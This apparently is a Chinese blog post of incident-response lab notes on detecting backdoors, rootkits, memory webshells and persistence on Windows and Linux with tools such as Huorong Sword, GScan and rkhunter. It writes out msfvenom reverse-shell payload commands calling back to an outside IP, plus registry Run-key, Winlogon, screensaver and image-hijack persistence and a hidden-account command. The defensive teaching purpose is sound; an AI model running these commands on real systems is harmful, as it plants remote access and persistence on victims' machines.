【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux

已于 2024-07-03 10:11:17 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: # 溯源反制与应急响应 文章标签: linux Rootki 内存马
于 2023-04-24 18:16:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/130046402
版权

文章目录


主机层面后门&Web层面后门&权限维持类后门

Windows实验

1、常规MSF后门-分析检测
2、权限维持后门-分析检测
3、Web程序内存马-分析检测
常见工具集合:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg

常规后门: ==网络对外连接查看 ==

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.xx.xx lport=6666 -f exe -o shell.exe

使用火绒剑工具查看数字签名文件以及回连ip
在这里插入图片描述

自启动测试:

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"

在这里插入图片描述

隐藏账户

net user whgojp$ whgojp!@#X123 /add

在这里插入图片描述

映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"		#修改注册表

在这里插入图片描述
同样的使用火绒剑也可以检测到并清除
在这里插入图片描述

屏保&登录

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f	#屏保
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe"		#远程登陆该计算机 启动shell

在这里插入图片描述

Linux实验

1、常规MSF后门-分析检测
2、Rootkit后门-分析检测
3、权限维持后门-分析检测
4、Web程序内存马-分析检测
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg

常规后门:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -f elf >shell.elf

在这里插入图片描述

Rootkit后门:GScan rkhunter

权限维持后门:GScan rkhunter

1、GScan Linux主机
https://github.com/grayddq/GScan
python GScan.py
在这里插入图片描述

2、rkhunter

wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz

tar -xvf rkhunter-1.4.6.tar.gz
cd rkhunter-1.4.6
./installer.sh --layout default --install
rkhunter -c

在这里插入图片描述

Web层面:通用系统层面

在这里插入图片描述
1、常规后门
2、内存马(无文件马)
PHP 进程马
.NET
JAVA
Python
……

An0nymouer
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
应急响应篇】内存应急响应指南
大河之犬的博客
04-16 623
Spring MVC 的拦截器(Interceptor)与 Java Servlet 的过滤器(Filter)类似,它主要用于拦截用户的请求并做相应的处理,通常应用在权限验证、记录请求信息的日志、判断用户是否登录等功能上。copagent 使用 javaagent 技术获得了全部的类,判断其包名、实现类名、接口名、注解来提取关键类,并根据类是否在磁盘上有资源链接对象、类中是否包含恶意行为关键字来判断其是否为内存。使用时先访问恶意的jsp动态注册Servlet,之后访问对应路径的Servlet命令执行。
在校自研内存查杀工具,非常实用
stopys6的博客
09-07 548
该工具总体解决了tomcat和spring内存的查杀问题,使蓝队师傅们在面对内存时不再只能使用重启大法。还得为一些可能再也起不来的服务担惊受怕。且该工具比较轻便,对服务没有太多入侵,不会影响服务的正常运行(别删错人家正常功能就行)。再者,该代码尽可能兼容了多版本的环境,使用起来兼容性较高。目前代码已经满足基本功能,后续打算放在github上开源供大家使用。目前还在不断的实战中看看有没有什么新的bug出现,等调试好了就会放到github上。在我后续文章中会放出github链接。
2024年Linux最全使用rkhunter检测Linuxrootkit(3),小白看完都学会了
最新发布
qq194582923的博客
05-03 1321
rootkit是Linux平台下最常见的一种木后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木比普通木后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木rootkit攻击能力极强,对系统的危害很大,它通过一套工具来建立后门和隐藏行迹,从而让攻击者保住权限,以使它在任何时候都可以使用root 权限登录到系统。rootkit主要有两种类型:文件级别和内核级别。文件级别的rootkit: 一般是通过程序漏洞或者系统漏洞进入系统后,通过修改系统的重要文件来达到隐藏自己的目的。
应急响应-后门攻击检测指南&Rookit&内存&权限维持&WIN&Linux
siu~
04-08 495
后门攻击检测指南&Rookit&内存&权限维持&WIN&Linux
应急响应】网站入侵篡改指南&Webshell内存查杀&漏洞排查&时间分析
今天是几号的博客
03-14 1980
并且gsl.aspx webshell实体被删除后,仍然可以连接正常使用,且无法扫描出内存。aspx内存查杀项目:ASP.NET-Memshell-Scanner-master。在日志里进行搜索,那些ip访问了gsl.aspx等后门文件。被注入内存之后,使用gsl可以直接连接任何路径"后门"火绒,管家,X60,Defender,Nod32等。5、在线webshell查杀-灭绝师太版。4、网页篡改与后门攻击防范应对指南。1、抗拒绝服务攻击防范应对指南。8、APT攻击入侵防范应对指南
4个好用的WebShell网站后门查杀工具 在线木查杀
热门推荐
IT技术宅-北方的刀郎
06-20 1万+
4个好用的WebShell网站后门查杀工具 在线木查杀 游子1年前建站资源97,576次0 迫于网上下载的主题、插件后门事件,游子介绍几款后门查杀软件! 检测工具分别是D盾_Web查杀、WebShellkiller、河查杀、百度WebShell检测 一、河查杀 http://www.shellpub.com http://www.webshell.pub 二、百度WebShell检测 https://scanner.baidu.com 三、D盾_Web查杀 http:/...
Linux平台下木rootkit的检测和防范
靠谱运维
07-20 1802
近些年来,在网络安全攻击中,高隐匿、高持久化的Rootkit技术成为黑客操控的主要手段,本文,我首先对Rootkit的几种类型进行介绍,主要让大家了解内核态Rootkit的高度定制化需求和Linux系统上存在的其他类型Rootkit,最后从攻防视角给出对Rootkit进行检测和防范的工具和方法。rootkit是Linux平台下最常见的一种木 后门工具,它主要通过替换系统文件来达到攻 击和和隐蔽的目的,这种木 比普通木 后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木
Hacker Defender ROOKIT检测工具源码
02-25
Hacker Defender ROOKIT检测工具源码
Hacker_Defender_ROOKIT.rar_hacker_木_木 扫描_木扫描
09-22
在压缩包"Hacker_Defender_ROOKIT.rar"中包含的"Hacker+Defender+ROOKIT.txt"文件,很可能是该工具的使用指南或开发者日志,从中可以获取更详细的使用方法和技术细节。对于学习者来说,深入研究这份文档,结合实践...
ROOKIT后门工具
06-21
1. **系统级后门**:这类后门通常通过修改操作系统内核或系统服务来实现,使得攻击者能够绕过常规的安全检查,获得系统管理员权限。 2. **应用程序后门**:恶意软件开发者会在合法软件中植入后门,一旦该软件被安装...
RooKit底层研究技术
06-02
RooKit底层技术研究,系统攻防,底层攻防,病毒隐藏
D盾网站源码后门检测工具
11-07
D盾网站源码后门检测工具
后门检测工具
02-10
一款可以检测软件是否捆绑了其他软件及病毒木的强大工具,软件本身还自带沙盘安装,让您远离病毒木的侵害
看雪论坛Rookit教程
09-05
看雪论坛关于Rookit技术的专题,值得收藏。
shellcode 上线转内存
文公子的博客
10-12 291
shellcode 上线转内存 1、使用msf制作shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.109.135 LPORT=1234 -f exe > /home/kali/Desktop/1.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch select
学习了解内存,看这篇就够了!(精华版)_什么是内存
jennycisp的博客
04-11 1057
内存,也被称为无文件,是无文件攻击的一种常用手段。虽然由来已久,但是在此之前并未“大红大紫”。近年来盛行于攻防演练之中,攻防演练从2016年的几家参演单位,到2020年扩充到了几百家参演单位,内存也越来越多的被提起,逐渐成为了攻击方的“必备武器”,针对内存的防护也越来越被重视。内存是无文件攻击的一种技术手段,那我们不得不先简单介绍一下无文件攻击
[KeyarchOS]Chkrootkit后门检测工具的安装
KeyarchOS的博客
09-13 2792
chkrootkit是一种开源工具,旨在帮助检测 Linux 系统中是否存在 rootkit 和恶意软件。rootkit 是一种用于隐藏恶意活动的恶意软件,它能够有效地掩盖自身和其他恶意行为,使攻击者可以在受感染的系统上保持持久的访问权限。它通过搜索常见的 rootkit 文件和代码,包括 Linux 内核模块 (LKM) 和用户空间 rootkit,来识别潜在的威胁。当 chkrootkit 扫描完成后,它会生成一个报告,列出任何被发现的可疑文件、隐藏进程和异常端口等。
服务器网站后门检测软件,服务器安全工具(后门检测)
weixin_29609679的博客
08-11 1296
服务器安全工具(后门检测)功能1.目前该工具只作为辅助查找,站长可自行添加正则表达式。2.服务器后门检测采用白名单特征检查方式,可检查出所有替换型后门变种。3.网站后门辅查支持自定义白名单,可以在网站初建时或本地原始备份进行白名单制作,可减少扫描结果便于判断。4.服务器综合管理,支持远程终端端口修改及开启,可卸载及管理危险组件。5.开关机时间检查,可发现非正常关机事件6.映像劫持管理,可查看、添加...
应急响应全栈
qq_29437513的博客
07-25 2485
应急响应全栈
网安术语:一句话、小、大、webshell、提权、后门rookit、源码打包、脱裤、暴库、嗅探、社工、poc、exp、cve分别都是什么意思
05-31
1. 一句话:一种常见的WebShell,指的是以一行代码的形式将一段恶意代码植入网站服务器,从而实现对服务器的控制。 2. 小:一种常见的WebShell,指的是以一段代码的形式将恶意代码植入网站服务器,从而实现对服务器的控制。 3. 大:一种常见的WebShell,指的是以多行代码的形式将恶意代码植入网站服务器,从而实现对服务器的控制,并且具有更加复杂的功能。 4. WebShell:一种通过Web应用程序实现的远程管理工具,攻击者可以通过WebShell控制受害者的服务器并执行恶意操作。 5. 提权:指攻击者利用各种漏洞或技术提升自己在系统中的权限,从而实现更高级别的攻击。 6. 后门:指攻击者在系统中留下的一种隐藏的访问方式,用于在未来的时间重新进入系统并执行恶意操作。 7. Rookit:指一种隐藏在系统内核或应用程序中的恶意软件,可以实现不被发现的控制和操作。 8. 源码打包:指攻击者将恶意代码混淆或打包成不易被检测的形式,以逃避检测和防御。 9. 脱裤:指攻击者获取受害者系统中的敏感信息,如密码、账户等。 10. 暴库:指攻击者利用漏洞或弱密码等方式获取数据库中的数据或控制数据库。 11. 嗅探:指攻击者获取网络中的数据包并进行分析,以获取敏感信息。 12. 社工:指攻击者通过社交工程手段获取受害者的敏感信息,如密码、账户等。 13. POC:指“Proof of Concept”的缩写,指的是一种用于证明漏洞存在的攻击代码或脚本。 14. EXP:指“Exploit”的缩写,指的是利用漏洞实施攻击的代码或脚本。 15. CVE:指“Common Vulnerabilities and Exposures”的缩写,是一种公开的漏洞编号标准,用于标识和跟踪漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值